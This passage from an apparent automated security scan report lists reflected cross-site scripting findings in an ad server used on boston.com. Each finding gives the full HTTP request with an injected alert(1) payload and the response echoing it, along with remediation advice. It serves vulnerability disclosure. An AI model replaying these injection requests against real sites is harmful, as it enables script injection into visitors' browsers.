var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/bus5df57'-alert(1)-'4e26a563c98;sz=728x90;net=q1;ord=386907169;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.13. http://a.collective-media.net/adj/q1.q.boston/bus [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/bus

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2803'-alert(1)-'241828aa501 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/bus;sz=728x90;ord=386907169?&a2803'-alert(1)-'241828aa501=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Tue, 19 Jul 2011 20:44:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:04 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/bus;sz=728x90;net=q1;ord=386907169?&a2803'-alert(1)-'241828aa501=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.14. http://a.collective-media.net/adj/q1.q.boston/bus [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/bus

Issue detail

The scanner attributes this finding to the sz request parameter, but in the request below the payload 20986'-alert(1)-'b05d3a33d8b is appended to the query string after the ?, while the sz matrix parameter keeps its value of 728x90. What is actually reflected is the whole request URI, query string included, copied into a JavaScript string which is encapsulated in single quotation marks. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/bus;sz=728x90;ord=386907169?20986'-alert(1)-'b05d3a33d8b HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Tue, 19 Jul 2011 20:44:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:02 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/bus;sz=728x90;net=q1;ord=386907169?20986'-alert(1)-'b05d3a33d8b;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.15. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbb0b'-alert(1)-'5e82e9a4066 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjdbb0b'-alert(1)-'5e82e9a4066/q1.q.boston/be_bus;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:39 GMT
Content-Length: 7281
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10121511467_1311108279","http://ad.doubleclick.net/adjdbb0b'-alert(1)-'5e82e9a4066/q1.q.boston/be_bus;net=q1;u=,q1-10121511467_1311108279,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=1807584008?","160",
...[SNIP]...

4.16. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f07c4'-alert(1)-'40a0d6bf13d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.bostonf07c4'-alert(1)-'40a0d6bf13d/be_bus;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:40 GMT
Content-Length: 7281
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10223486171_1311108280","http://ad.doubleclick.net/adj/q1.q.bostonf07c4'-alert(1)-'40a0d6bf13d/be_bus;net=q1;u=,q1-10223486171_1311108280,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=1807584008?","160","600",false)
...[SNIP]...

4.17. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57876'-alert(1)-'7b7238e5418 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_bus57876'-alert(1)-'7b7238e5418;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:41 GMT
Content-Length: 7281
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10120332704_1311108281","http://ad.doubleclick.net/adj/q1.q.boston/be_bus57876'-alert(1)-'7b7238e5418;net=q1;u=,q1-10120332704_1311108281,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=1807584008?","160","600",false);</scr'
...[SNIP]...

4.18. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4493a'-alert(1)-'db01ffce823 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_bus;sz=4493a'-alert(1)-'db01ffce823 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7263
Date: Tue, 19 Jul 2011 20:44:31 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
CollectiveMedia.createAndAttachAd("q1-10101739410_1311108271","http://ad.doubleclick.net/adj/q1.q.boston/be_bus;net=q1;u=,q1-10101739410_1311108271,11fda490648f83c,none,q1.ent_h-q1.jobs_h;;cmw=nurl;sz=4493a'-alert(1)-'db01ffce823;contx=none;dc=w;btg=q1.ent_h;btg=q1.jobs_h?","4493a'-alert(1)-'db01ffce823","",false);</scr'+'ipt>
...[SNIP]...

4.19. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a78b9'-alert(1)-'fd7d7acbe2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadja78b9'-alert(1)-'fd7d7acbe2c/q1.q.boston/be_home;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7668
Date: Tue, 19 Jul 2011 20:42:43 GMT
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10114459464_1311108163","http://ad.doubleclick.net/adja78b9'-alert(1)-'fd7d7acbe2c/q1.q.boston/be_home;net=q1;u=,q1-10114459464_1311108163,11fda490648f83c,ent,q1.ent_h;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=q1.ent_h;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.20. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af700'-alert(1)-'6bc1ce727e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.bostonaf700'-alert(1)-'6bc1ce727e7/be_home;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:44 GMT
Content-Length: 7668
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10322274056_1311108164","http://ad.doubleclick.net/adj/q1.q.bostonaf700'-alert(1)-'6bc1ce727e7/be_home;net=q1;u=,q1-10322274056_1311108164,11fda490648f83c,ent,q1.ent_h;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=q1.ent_h;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.21. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a6a7'-alert(1)-'89308257669 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_home5a6a7'-alert(1)-'89308257669;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:44 GMT
Content-Length: 7668
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10109802729_1311108164","http://ad.doubleclick.net/adj/q1.q.boston/be_home5a6a7'-alert(1)-'89308257669;net=q1;u=,q1-10109802729_1311108164,11fda490648f83c,ent,q1.ent_h;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=q1.ent_h;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.22. http://a.collective-media.net/cmadj/q1.q.boston/be_home [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f18'-alert(1)-'d3edc27fb23 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_home;sz=71f18'-alert(1)-'d3edc27fb23 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7657
Date: Tue, 19 Jul 2011 20:42:38 GMT
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
ascript">CollectiveMedia.createAndAttachAd("q1-10223658430_1311108158","http://ad.doubleclick.net/adj/q1.q.boston/be_home;net=q1;u=,q1-10223658430_1311108158,11fda490648f83c,none,q1.ent_l;;cmw=nurl;sz=71f18'-alert(1)-'d3edc27fb23;contx=none;dc=w;btg=q1.ent_l?","71f18'-alert(1)-'d3edc27fb23","",false);</scr'+'ipt>
...[SNIP]...

4.23. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ace44'-alert(1)-'493b799af02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjace44'-alert(1)-'493b799af02/q1.q.boston/bus;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:23 GMT
Content-Length: 7277
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
